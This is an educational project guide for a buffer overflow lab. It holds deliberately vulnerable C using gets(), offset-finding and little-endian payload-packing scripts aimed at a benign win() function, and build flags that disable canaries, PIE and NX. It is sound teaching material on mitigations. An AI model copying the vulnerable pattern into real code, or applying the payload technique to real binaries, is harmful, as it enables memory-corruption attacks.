Project 5: Exploit Lab (Buffer Overflow Playground)

Build a controlled lab that demonstrates a stack buffer overflow and how mitigations (ASLR, NX, canaries) change the outcome.

Quick Reference

Attribute	Value
Difficulty	Advanced
Time Estimate	15-25 hours
Main Programming Language	C
Alternative Programming Languages	C++, Rust (for tooling)
Coolness Level	Very High
Business Potential	Medium (security training)
Prerequisites	Stack frames, C pointers, basic GDB
Key Topics	Stack layout, buffer overflow, mitigations, reproducible labs

1. Learning Objectives

By completing this project, you will:

Build a vulnerable binary and demonstrate a controlled crash.
Calculate overwrite offsets and confirm them in GDB.
Explain how ASLR, NX, and stack canaries mitigate attacks.
Create a deterministic lab mode with fixed addresses.
Practice safe, isolated exploitation workflows.

2. All Theory Needed (Per-Concept Breakdown)

2.1 Stack Frames and Calling Conventions

Fundamentals

A stack frame is the memory region used by a function call to store local variables, saved registers, and the return address. The return address is the address of the instruction at which execution resumes after the function returns. In many calling conventions, local buffers are stored below the saved return address, which means that writing past the end of a buffer can overwrite the return address. Understanding stack layout is critical to exploitation because the exploit relies on predictable placement of the return address relative to a buffer.

Deep Dive into the Concept

On x86-64 System V, function arguments are passed in registers (RDI, RSI, RDX, RCX, R8, R9), and the stack pointer (RSP) must be aligned to 16 bytes at call boundaries. A typical function prologue saves the base pointer (RBP) and reserves stack space for locals by subtracting from RSP. The stack grows downward, so local variables are at lower addresses than the saved return address. This layout is visible in GDB using info frame and x/ memory commands.
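The 16-byte alignment rule is one reason the space reserved for locals is often larger than the sum of their sizes. A minimal sketch of the rounding arithmetic, written in Python (the language of the lab's payload.py tooling); the helper name align_up is hypothetical, and a real compiler may add further padding of its own:

```python
def align_up(size: int, alignment: int = 16) -> int:
    """Round size up to the next multiple of alignment (must be a power of two)."""
    return (size + alignment - 1) & ~(alignment - 1)


# A 16-byte buffer fits exactly; 20 bytes of locals would need 32 reserved.
for locals_size in (16, 20, 33):
    print(locals_size, "->", align_up(locals_size))
```

This is why the measured offset to the return address should always be confirmed in GDB rather than derived from the buffer size alone.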

Stack frames also contain saved registers and spill slots. The compiler decides whether to keep a variable in a register or on the stack. With optimizations disabled (-O0 -fno-omit-frame-pointer), the layout is stable and easy to analyze. This is crucial for a deterministic lab. If the compiler inlines functions or omits the frame pointer, the stack layout changes and becomes harder to predict. For the lab, you should compile with settings that keep frames explicit.

The return address is stored by the call instruction. When a function returns, the ret instruction pops the return address from the stack into RIP. If an attacker overwrites that address, they control execution flow. The buffer overflow exploit is a direct consequence of this mechanism: a write past the end of a local buffer can reach the saved return address. The offset from the start of the buffer to the return address is a key number you must compute and verify.

Stack alignment and red zones matter too. The x86-64 System V ABI defines a 128-byte “red zone” below the stack pointer that leaf functions can use for locals without adjusting RSP. A function that calls gets is not a leaf, so the red zone does not apply to vuln itself, but it can change how small helper functions look in GDB. For a teaching lab, you can disable red zone usage (e.g., -mno-red-zone on x86-64) so that every function reserves its locals explicitly. This keeps the layout predictable.

Finally, stack frames interact with mitigations. Stack canaries place a random value between local buffers and the return address. If a buffer overflow corrupts the canary, the program aborts before using the corrupted return address. This is a software defense that depends on a stable stack layout. Understanding the frame layout is the foundation for understanding how canaries detect corruption.

How this fits in the project

Stack layout is used to compute offsets in Section 3.2 and observed in Section 3.7 and Section 5.5.

Definitions & key terms

Stack frame: Memory used for a function call.
Return address: Instruction pointer saved on the stack.
Prologue/Epilogue: Instructions that set up and tear down a frame.
Frame pointer: Register (RBP) pointing to current frame.

Mental model diagram (ASCII)

High addresses
+-------------------+
| Return Address    |
| Saved RBP         |
| Local buffer[16]  |  <- overflow can reach above
+-------------------+
Low addresses

How it works (step-by-step, with invariants and failure modes)

call pushes return address.
Prologue sets RBP and reserves locals.
Local buffer occupies space below saved RBP.
ret pops return address and jumps.

Invariant: Return address must remain unchanged for correct execution.

Failure modes: Buffer overflow corrupts return address or canary.
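The layout in the steps above can be turned into simple offset arithmetic. The sketch below assumes the idealized frame from the diagram (buffer, optional compiler padding, saved RBP, return address, all contiguous); frame_offsets and its padding parameter are illustrative names, not part of any tool:

```python
POINTER_SIZE = 8  # bytes per saved register slot on x86-64


def frame_offsets(buf_size: int, padding: int = 0) -> dict:
    """Offsets, measured from buf[0], of the slots that sit above the buffer.

    Assumes the buffer is the only local and that `padding` bytes (if any)
    lie between the end of the buffer and the saved RBP.
    """
    saved_rbp = buf_size + padding
    return_address = saved_rbp + POINTER_SIZE
    return {"buf": 0, "saved_rbp": saved_rbp, "return_address": return_address}


print(frame_offsets(16))
print(frame_offsets(16, padding=16))
```

The padding value is exactly what a cyclic pattern or a GDB session measures; the model only explains where the final number comes from.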

Minimal concrete example

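#include <stdio.h>

// gets() was removed in C11; an older mode such as -std=c99 keeps it declared.
void vuln(void) {
    char buf[16];
    gets(buf); // unsafe: no bounds check, so more than 15 input bytes overflow buf
}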

Common misconceptions

“The stack is random.” -> It is structured, though ASLR randomizes base.
“All variables are on the stack.” -> Many live in registers.
“Return address is protected.” -> Not without mitigations.

Check-your-understanding questions

Why does -fno-omit-frame-pointer help debugging?
Where is the return address relative to a local buffer?
What does ret do?

Check-your-understanding answers

It keeps RBP-based frames for stable layout.
Above it, at higher addresses.
Pops return address into instruction pointer.

Real-world applications

Reverse engineering and debugging.
Exploit analysis and mitigation evaluation.

Where you’ll apply it

Section 3.2 Functional Requirements
Section 5.5 Questions to Guide Your Design
Also used in: Project 1: Memory Inspector Tool

References

“Practical Binary Analysis” (stack frames)
“Computer Systems: A Programmer’s Perspective” (procedure calls)

Key insights

Stack frames define exactly where control-flow data lives.

Summary

You can now reason about stack layout and predict overwrite offsets.

Homework/Exercises to practice the concept

Compile a function with -O0 -fno-omit-frame-pointer and inspect RBP/RSP in GDB.
Find the offset from a buffer to the return address.

Solutions to the homework/exercises

Use info registers and x/ in GDB.
Use a cyclic pattern and inspect the overwritten return address at the crash (on x86-64, the 8 bytes at $rsp when ret faults).

2.2 Buffer Overflow Mechanics and Payload Design

Fundamentals

A buffer overflow occurs when a program writes more data into a buffer than it can hold. In stack-based overflows, writing past the buffer can overwrite the return address, causing the program to jump to an attacker-controlled address. The simplest exploit is to overwrite the return address with a known value and cause a crash, proving control. This project focuses on understanding the mechanics rather than building real-world exploits.

Deep Dive into the Concept

The core idea is that memory is contiguous. A local buffer on the stack is placed adjacent to other data, including the saved return address. If the program uses an unsafe function like gets or strcpy without bounds checks, a long input will continue writing bytes beyond the buffer boundary. By carefully choosing the input, you can overwrite the return address with a value you control. When the function returns, the CPU jumps to that value.

Finding the exact offset is the key step. A common technique is to use a cyclic pattern (e.g., “AAAABBBBCCCC…”) so that when the program crashes, you can read the overwritten return address and map it back to the pattern position. Tools like pwntools automate this, but you can also build a simple pattern generator in C or Python. Once you know the offset, you can craft a payload: padding + new_return_address. In a lab, the new return address might be 0x4141414141414141 (eight “A” bytes) to demonstrate control, or the address of a win() function inside the program that prints a success message. On x86-64 an all-ASCII value like that is a non-canonical address, so the fault is raised by the ret instruction itself: RIP still points at ret, and the overwritten value is the 8 bytes at the top of the stack (x/gx $rsp in GDB).
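A pattern generator along these lines might look like the following Python sketch. It uses the common upper/lower/digit triple scheme (Aa0Aa1Aa2...) rather than repeated letters, so that every 8-byte window is unique; the function names cyclic_pattern and find_offset are hypothetical, and the "observed" value here is taken from the pattern itself instead of a real crash:

```python
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Return `length` bytes of Aa0Aa1Aa2... built from unique 3-byte groups."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode("ascii")
    raise ValueError("length exceeds the 20280-byte unique range of this pattern")


def find_offset(observed: int, pattern: bytes) -> int:
    """Find the 8-byte little-endian value seen at the crash; -1 if absent."""
    return pattern.find(struct.pack("<Q", observed))


pattern = cyclic_pattern(64)
# Stand-in for the value read from the stack at the crash: the 8 pattern
# bytes that would land on a return address 24 bytes past the buffer start.
observed = struct.unpack_from("<Q", pattern, 24)[0]
print(find_offset(observed, pattern))  # prints 24
```

In a real run, the observed value would come from GDB, and the pattern length only needs to exceed the expected distance to the return address.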

Payload design depends on endianness. On little-endian systems such as x86-64, a multi-byte address is stored least significant byte first, so the bytes in the payload appear in reverse order compared with how the address is written in hex. Because gets stops reading at a newline, the encoded address must also not contain the byte 0x0a. For a deterministic lab, you can compile without PIE (-no-pie) so that function addresses are fixed. That allows you to build a payload that always jumps to the same address, even though ASLR may still move the stack, and makes the outcome predictable.
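The byte ordering is easy to get wrong by hand, so it helps to let struct do the encoding. The sketch below is one possible shape for the packing step; the address 0x401136 and the offset 24 are placeholder assumptions (real values come from nm and from your own offset measurement), and build_payload is a hypothetical helper name:

```python
import struct

WIN_ADDRESS = 0x401136  # placeholder; read the real value from `nm vuln`
OFFSET = 24             # placeholder; measure it for your own build


def build_payload(offset: int, address: int) -> bytes:
    """Padding followed by the address as 8 little-endian bytes."""
    payload = b"A" * offset + struct.pack("<Q", address)
    # gets() stops at the first newline, so such a payload would be truncated.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte (0x0a)")
    return payload


payload = build_payload(OFFSET, WIN_ADDRESS)
print(payload[OFFSET:].hex())  # prints 3611400000000000
```

Note how 0x401136 becomes the byte sequence 36 11 40 followed by five zero bytes.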

The exploit demonstration should remain safe. Instead of executing shellcode, use a benign win() function that prints “you win” and then calls exit(0); returning normally from win() would pop whatever bytes follow the overwritten return address and crash. This keeps the lab educational and avoids introducing harmful techniques. The lesson is not how to compromise systems but how unsafe memory operations can redirect control flow.

The lab should also include a failure mode: if the payload is the wrong length, the program should crash with a different return address or fail to reach win(). This teaches that exploitation requires precision. You should also demonstrate how compiler warnings and modern safety flags (like -fstack-protector) prevent or detect these overflows.

Finally, connect this concept back to safe coding practices: the same overflow that allows control flow hijack also causes crashes and data corruption in real software. The lab’s purpose is to make these abstract dangers concrete so that you will avoid them in production code.

How this fits in the project

This concept drives the payload construction in Section 3.7 and the lab design in Section 5.10.

Definitions & key terms

Overflow: Write beyond buffer bounds.
Payload: Crafted input to overwrite control data.
Offset: Number of bytes to reach the return address.
PIE: Position-independent executable; its code base address can be randomized by ASLR.

Mental model diagram (ASCII)

[buf 16 bytes][saved RBP 8 bytes][return addr 8 bytes]
AAAA...AAAA   BBBBBBBB           CCCCCCCC -> overwrites return addr

How it works (step-by-step, with invariants and failure modes)

Provide oversized input to vulnerable function.
Input overwrites stack frame data.
Return address becomes attacker-controlled.
Function returns and jumps to new address.

Invariant: Without overflow, return address is unchanged.

Failure modes: Wrong offset, mitigations, ASLR.
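The four steps can be rehearsed without touching a real process by modeling the frame as a byte array. This is only a simulation under the idealized layout from the diagram (16-byte buffer, saved RBP, return address); all addresses are made-up values, and gets_like_copy is a stand-in that mimics the missing bounds check:

```python
import struct

BUF_SIZE = 16
RETURN_SLOT = BUF_SIZE + 8   # buf, then saved RBP, then the return address
ORIGINAL_RETURN = 0x401200   # made-up address inside the caller


def make_frame() -> bytearray:
    frame = bytearray(BUF_SIZE)                   # char buf[16]
    frame += struct.pack("<Q", 0x7FFFFFFFE000)    # saved RBP (made-up value)
    frame += struct.pack("<Q", ORIGINAL_RETURN)   # saved return address
    return frame


def gets_like_copy(frame: bytearray, line: bytes) -> None:
    """Copy the line plus a NUL terminator with no check against BUF_SIZE.

    Bytes that would fall outside the modeled frame are simply dropped.
    """
    data = line + b"\x00"
    count = min(len(data), len(frame))
    frame[:count] = data[:count]


def saved_return(frame: bytearray) -> int:
    return struct.unpack_from("<Q", frame, RETURN_SLOT)[0]


safe = make_frame()
gets_like_copy(safe, b"hello")
print(hex(saved_return(safe)))      # prints 0x401200

smashed = make_frame()
gets_like_copy(smashed, b"A" * RETURN_SLOT + struct.pack("<Q", 0x401136))
print(hex(saved_return(smashed)))   # prints 0x401136
```

Shortening the padding by a few bytes leaves a mangled value in the return slot, which is the "wrong offset" failure mode.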

Minimal concrete example

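#include <stdio.h>
#include <stdlib.h>

void win(void) { puts("WIN"); exit(0); } // exit: returning would pop a garbage address
void vuln(void) {
    char buf[16];
    gets(buf); // unbounded read: the overflow point
}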

Common misconceptions

“Any overflow gives control.” -> Only if it reaches control data.
“Offsets are constant across builds.” -> Compiler options change layout.
“Exploits always use shellcode.” -> Not necessary for learning.

Check-your-understanding questions

Why does PIE make exploit addresses unstable?
Why must payloads respect endianness?
Why is a win() function useful in a lab?

Check-your-understanding answers

With PIE, the loader can place the code at a different base address on each run when ASLR is on.
Multi-byte values are stored least significant byte first.
It provides a safe, deterministic target.

Real-world applications

Security research and vulnerability triage.
Understanding crash reports caused by overflows.

Where you’ll apply it

Section 3.7 Real World Outcome
Section 5.8 Hints in Layers
Also used in: Project 2: Safe String Library as the prevention case.

References

“Hacking: The Art of Exploitation” (buffer overflows)
“Practical Binary Analysis” (exploit basics)

Key insights

Overflows become exploits when you control where the program returns.

Summary

You can now design and test simple overflow payloads in a controlled lab.

Homework/Exercises to practice the concept

Write a cyclic pattern generator and verify offsets.
Modify the buffer size and recompute the offset.

Solutions to the homework/exercises

Use a sequence of unique three-character groups (uppercase, lowercase, digit), as in Aa0Aa1Aa2..., so that each 8-byte window appears only once.
Re-run the crash and recompute the index.

2.3 Mitigations and Deterministic Lab Design

Fundamentals

Modern systems deploy mitigations like ASLR, NX (non-executable memory), and stack canaries to prevent buffer overflow exploits. For a teaching lab, you need to understand how to enable and disable these mitigations so you can observe their effects. You also need a deterministic mode where addresses and results are stable. This ensures your lab output matches documentation and tests.

Deep Dive into the Concept

ASLR randomizes the base addresses of the stack, heap, and libraries. This makes it hard to predict addresses across runs, which is why many exploits fail when ASLR is enabled. NX marks stack pages as non-executable, so even if you overwrite a return address to jump into injected shellcode on the stack, the CPU will refuse to execute it. Stack canaries place a random value before the return address; if a buffer overflow overwrites the canary, the program aborts before returning. These mitigations are designed to stop exactly the kind of exploit demonstrated in this lab.
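The canary check in particular is simple enough to model. The following Python sketch simulates a frame with a guard value between the buffer and the saved registers; it is a teaching model, not how the compiler implements the check, and the names call_vuln and StackSmashingDetected as well as the address 0x401200 are invented for illustration:

```python
import os
import struct

BUF_SIZE = 16
ORIGINAL_RETURN = 0x401200  # made-up caller address


class StackSmashingDetected(Exception):
    """Raised where a real binary would abort."""


def call_vuln(line: bytes) -> int:
    """Simulate one call: fill the buffer, check the canary, then 'return'."""
    canary = os.urandom(8)  # fresh random guard value
    frame = bytearray(BUF_SIZE) + canary + bytes(8) + struct.pack("<Q", ORIGINAL_RETURN)
    # Layout: buf | canary | saved RBP | return address

    count = min(len(line), len(frame))
    frame[:count] = line[:count]  # unchecked copy, as gets() would do

    # Epilogue check: compare the guard before the return address is used.
    if bytes(frame[BUF_SIZE:BUF_SIZE + 8]) != canary:
        raise StackSmashingDetected("canary changed")
    return struct.unpack_from("<Q", frame, BUF_SIZE + 16)[0]


print(hex(call_vuln(b"short input")))  # prints 0x401200
try:
    call_vuln(b"A" * 40)
except StackSmashingDetected as exc:
    print("aborted:", exc)
```

A linear overflow cannot reach the return address without passing through the guard first, which is why the check catches it.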

For a deterministic educational lab, you want two build modes: “vulnerable” and “protected.” The vulnerable mode should disable canaries (-fno-stack-protector), disable PIE (-no-pie), and allow executable stacks if you plan to demonstrate NX (-z execstack). The protected mode should enable canaries and PIE (-fstack-protector-strong -D_FORTIFY_SOURCE=2 -pie -fPIE) and compile with optimization (-O1 or higher), which _FORTIFY_SOURCE needs in order to take effect. This contrast demonstrates the effect of mitigations.

To make the lab reproducible, you should provide a script that runs with ASLR disabled in a controlled environment. On Linux, setarch -R can disable ASLR for a single process without changing global settings. This is safer than writing to /proc/sys/kernel/randomize_va_space. The lab should instruct users to run in a VM or container and to restore security settings after experiments. This is critical for ethical practice.

Deterministic output is also needed for tests and documentation. In vulnerable mode with ASLR disabled and PIE off, function addresses remain constant. This allows you to hardcode the win() address in your demo payload and show a stable transcript. For example, your demo can use a fixed payload file checked into the repo (payload.bin) and show that it always triggers the win() function. This yields a deterministic golden path for the project requirements.
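One way to keep payload.bin reproducible is to generate it from the symbol table instead of typing the address by hand. The sketch below parses text in the three-column format that nm prints; the sample listing is invented for illustration (real addresses will differ), the offset of 24 is an assumption to be replaced by your measured value, and symbol_address and write_payload are hypothetical helper names:

```python
import struct
from pathlib import Path

# Invented `nm -n vuln` style output for illustration; real addresses differ.
SAMPLE_NM_OUTPUT = """\
0000000000401136 T win
000000000040114c T vuln
0000000000401168 T main
"""


def symbol_address(nm_output: str, name: str) -> int:
    """Return the address of `name` from 'ADDRESS TYPE NAME' lines."""
    for line in nm_output.splitlines():
        fields = line.split()
        if len(fields) == 3 and fields[2] == name:
            return int(fields[0], 16)
    raise KeyError(f"symbol {name!r} not found")


def write_payload(path: Path, offset: int, address: int) -> bytes:
    """Write padding plus the little-endian address and return the bytes."""
    payload = b"A" * offset + struct.pack("<Q", address)
    path.write_bytes(payload)
    return payload


if __name__ == "__main__":
    win = symbol_address(SAMPLE_NM_OUTPUT, "win")
    data = write_payload(Path("payload.bin"), 24, win)  # 24 is an assumed offset
    print(f"win() at {win:#x}, wrote {len(data)} bytes")
```

In the actual lab, the listing would come from running nm on the freshly built vuln binary, so the checked-in payload can be regenerated whenever the build changes.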

Mitigations are also a conceptual lesson: most overflows are no longer trivially exploitable in modern environments, but they are still serious. A crash can be a denial of service, and complex exploits can still bypass mitigations. The lab should end with a clear statement: the goal is to understand why mitigations exist and how to write safer code, not to build real-world attacks.

How this fits in the project

Mitigations define the two build modes in Section 3.2 and drive the deterministic demo in Section 3.7.

Definitions & key terms

ASLR: Randomizes memory layout per run.
NX: Marks memory non-executable.
Stack canary: Guard value detecting overflows.
PIE: Position-independent executable.

Mental model diagram (ASCII)

Vulnerable build: fixed addresses, no canary
Protected build: random addresses, canary checks

How it works (step-by-step, with invariants and failure modes)

Build vulnerable binary with mitigations off.
Disable ASLR for deterministic run.
Run payload and reach win().
Build protected binary; same payload fails.

Invariant: Protected build should detect or prevent overflow.

Failure modes: Running with ASLR on yields non-deterministic results.

Minimal concrete example

# Vulnerable build
clang -O0 -fno-stack-protector -no-pie -z execstack vuln.c -o vuln
# Protected build
clang -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2 -pie -fPIE vuln.c -o vuln_protected
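After building, it is worth confirming that the two binaries really differ. One quick check is the e_type field of the ELF header, which is ET_EXEC (2) for a fixed-address executable and ET_DYN (3) for a PIE. The sketch below reads only the first 18 bytes of a file; elf_type is a hypothetical helper, and tools such as checksec report the same information along with other mitigations:

```python
import struct

ET_EXEC = 2  # fixed load address (non-PIE executable)
ET_DYN = 3   # position-independent (PIE executable or shared object)


def elf_type(header: bytes) -> str:
    """Classify an ELF file from the first 18 bytes of its header."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    byte_order = "<" if header[5] == 1 else ">"  # EI_DATA: 1 means little-endian
    (e_type,) = struct.unpack_from(byte_order + "H", header, 16)
    if e_type == ET_EXEC:
        return "non-PIE"
    if e_type == ET_DYN:
        return "PIE"
    return f"other ({e_type})"


def check_file(path: str) -> str:
    with open(path, "rb") as handle:
        return elf_type(handle.read(18))


# Example (requires the binaries to exist):
#   print(check_file("vuln"), check_file("vuln_protected"))
```

With the build commands above, vuln would be expected to report non-PIE and vuln_protected PIE.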

Common misconceptions

“Mitigations make code safe.” -> They reduce exploitability, not bugs.
“ASLR can be ignored.” -> It breaks naive exploit scripts.
“Turning off mitigations is harmless.” -> Only safe in isolated labs.

Check-your-understanding questions

Why does PIE make addresses unstable?
What does a stack canary detect?
Why use setarch -R instead of changing sysctl globally?

Check-your-understanding answers

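PIE lets ASLR load the binary at a random base address.
A linear overwrite that runs from a local buffer toward the saved return address; the canary sits between them and is checked before the function returns.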
It limits scope to a single process.

Real-world applications

Security training labs.
Verifying compiler mitigation flags.

Where you’ll apply it

Section 3.7 Real World Outcome
Section 5.10 Implementation Phases
Also used in: Project 3: Memory Leak Detector

References

“Practical Binary Analysis” (mitigations)
“Hacking: The Art of Exploitation” (defenses)

Key insights

Mitigations shift overflow bugs from “trivial exploit” to “hard problem.”

Summary

You can now build a safe, deterministic exploit lab and compare mitigation effects.

Homework/Exercises to practice the concept

Compile the same program with and without PIE and compare addresses.
Enable stack canaries and observe the crash message.

Solutions to the homework/exercises

Use nm -n to compare symbol addresses.
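The program should abort with a “stack smashing detected” message; if _FORTIFY_SOURCE intercepts the gets call first, glibc reports “buffer overflow detected” instead.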

3. Project Specification

3.1 What You Will Build

A controlled lab with:

A vulnerable binary (vuln) containing a stack buffer overflow.
A protected binary (vuln_protected) built with mitigations.
A deterministic payload that triggers a safe win() function.
A README describing safe usage in a VM/container.

3.2 Functional Requirements

Vulnerable binary uses unsafe input (e.g., gets).
Protected binary uses compiler mitigations.
Demo payload reaches win() in vulnerable build.
Same payload fails in protected build.
GDB steps show overwritten return address.

3.3 Non-Functional Requirements

Safety: Must run in isolated environment; no real exploitation targets.
Determinism: Fixed addresses in vulnerable build.
Usability: Clear scripts and output.

3.4 Example Usage / Output

$ ./vuln < payload.bin
WIN: control flow hijacked safely!

3.5 Data Formats / Schemas / Protocols

Payload format:

[padding bytes][return address (little-endian)]

3.6 Edge Cases

Wrong payload length (crash without win).
Running with ASLR enabled (non-deterministic).
Protected binary aborts on canary detection.

3.7 Real World Outcome

The lab should show a successful overflow in vulnerable mode and a failure in protected mode.

3.7.1 How to Run (Copy/Paste)

make vuln vuln_protected
setarch $(uname -m) -R ./vuln < payload.bin
./vuln_protected < payload.bin

3.7.2 Golden Path Demo (Deterministic)

$ setarch $(uname -m) -R ./vuln < payload.bin
WIN: control flow hijacked safely!
Exit code: 0

3.7.3 Exact Terminal Transcript (Protected Build)

$ ./vuln_protected < payload.bin
*** stack smashing detected ***: terminated
Exit code: 134
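The exit code 134 follows the shell convention of 128 plus the signal number, and abort() raises SIGABRT (signal 6). If a test script launches the binaries with Python's subprocess module, a process killed by a signal is reported as a negative return code instead, so a small conversion keeps transcripts comparable. The helper names below are hypothetical:

```python
import signal


def shell_exit_code(returncode: int) -> int:
    """Map a subprocess return code to the value a shell shows in $?."""
    return 128 - returncode if returncode < 0 else returncode


def describe(returncode: int) -> str:
    """Human-readable summary of how the process ended."""
    if returncode < 0:
        return f"killed by {signal.Signals(-returncode).name}"
    return f"exited with status {returncode}"


# subprocess.run(...).returncode is -SIGABRT when the canary check aborts.
print(shell_exit_code(-signal.SIGABRT))  # prints 134
print(describe(-signal.SIGABRT))
print(describe(0))
```

A plain segmentation fault from a wrong-length payload would map to 139 by the same rule.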

4. Solution Architecture

4.1 High-Level Design

[vuln.c] -> [build variants] -> [payload] -> [demo output]

4.2 Key Components

Component	Responsibility	Key Decisions
Vulnerable program	unsafe input	`gets` for demonstration
Protected program	mitigations	PIE + canary
Payload generator	deterministic input	fixed offset + address
README	safety rules	VM / container usage

4.3 Data Structures (No Full Code)

char buf[16];
// stack layout implicitly defined by compiler

4.4 Algorithm Overview

Key Algorithm: Offset Discovery

Generate cyclic pattern.
Crash program and read the overwritten return address (on x86-64, the 8 bytes at RSP when ret faults).
Compute offset.
Build payload with win() address.

Complexity Analysis:

Time: O(n) for pattern search.
Space: O(n).

5. Implementation Guide

5.1 Development Environment Setup

sudo apt-get install gdb clang

5.2 Project Structure

exploit_lab/
|-- vuln.c
|-- payload.py
|-- payload.bin
|-- Makefile
\-- README.md

5.3 The Core Question You’re Answering

“How does a single out-of-bounds write become control over execution?”

5.4 Concepts You Must Understand First

Stack frames and calling conventions (see Section 2.1).
Buffer overflow mechanics (see Section 2.2).
Mitigations and deterministic lab setup (see Section 2.3).

5.5 Questions to Guide Your Design

How will you keep the lab safe and isolated?
What compiler flags ensure deterministic addresses?
How will you show mitigations in action?

5.6 Thinking Exercise

If the buffer is 16 bytes and the saved return address sits 24 bytes above the start of the buffer, how many bytes must your payload contain before the new return address?

5.7 The Interview Questions They’ll Ask

What is a stack buffer overflow?
How does ASLR make exploits harder?
What does a stack canary protect?

5.8 Hints in Layers

Hint 1: Start with a vulnerable function and confirm it crashes.
Hint 2: Use GDB to inspect the stack.
Hint 3: Use a cyclic pattern to find offset.
Hint 4: Add a win() function and jump to it.

5.9 Books That Will Help

5.10 Implementation Phases

Phase 1: Vulnerable Program (3-4 hours)

Goals: create overflow and confirm crash.
Checkpoint: program crashes with long input.

Phase 2: Offset + Payload (4-6 hours)

Goals: compute offset and reach win().
Checkpoint: deterministic win message.

Phase 3: Mitigations (4-6 hours)

Goals: build protected version and observe failure.
Checkpoint: protected build aborts.

5.11 Key Implementation Decisions

6. Testing Strategy

6.1 Test Categories

6.2 Critical Test Cases

Vulnerable build with correct payload reaches win().
Protected build aborts with stack smashing.
Wrong payload does not reach win().

6.3 Test Data

payload.bin (fixed offset + win addr)

7. Common Pitfalls & Debugging

7.1 Frequent Mistakes

7.2 Debugging Strategies

Use info frame and x/16gx $rsp in GDB (the g size prints each 8-byte stack slot as one value).
Print the address of win() at runtime.

7.3 Performance Traps

Not relevant; focus is correctness and reproducibility.

8. Extensions & Challenges

8.1 Beginner Extensions

Add a script that prints stack layout.
Add a CLI option to show offsets.

8.2 Intermediate Extensions

Add canary detection demo with custom message.
Add a simple return-to-libc demo inside VM.

8.3 Advanced Extensions

Build a small ROP chain (in a VM only).
Add ASLR bypass discussion (theoretical).

9. Real-World Connections

9.1 Industry Applications

Security training and vulnerability analysis.
Crash triage and exploitability assessment.

9.2 Related Tools

pwntools (exploit development toolkit)
checksec (mitigation checker)

9.3 Interview Relevance

Explaining stack overflows and mitigations is common in security interviews.

10. Resources

10.1 Essential Reading

“Practical Binary Analysis” (exploit basics)
“Hacking: The Art of Exploitation” (mitigations)

10.2 Video Resources

University lectures on exploit mitigation.

10.3 Tools & Documentation

man 1 gdb, man 2 mprotect, man 1 setarch

11. Self-Assessment Checklist

11.1 Understanding

I can describe the stack frame layout.
I can compute overflow offsets.
I can explain how mitigations work.

11.2 Implementation

Vulnerable and protected builds work.
Deterministic demo output is achieved.
README includes safety guidance.

11.3 Growth

I can explain why safe coding prevents these bugs.

12. Submission / Completion Criteria

Minimum Viable Completion:

Vulnerable binary and crash demonstration.
Deterministic payload reaching win().

Full Completion:

Protected build demonstrating mitigations.
Clear instructions and safety notes.

Excellence (Going Above & Beyond):

Optional return-to-libc demo in isolated VM.
Additional mitigation experiments.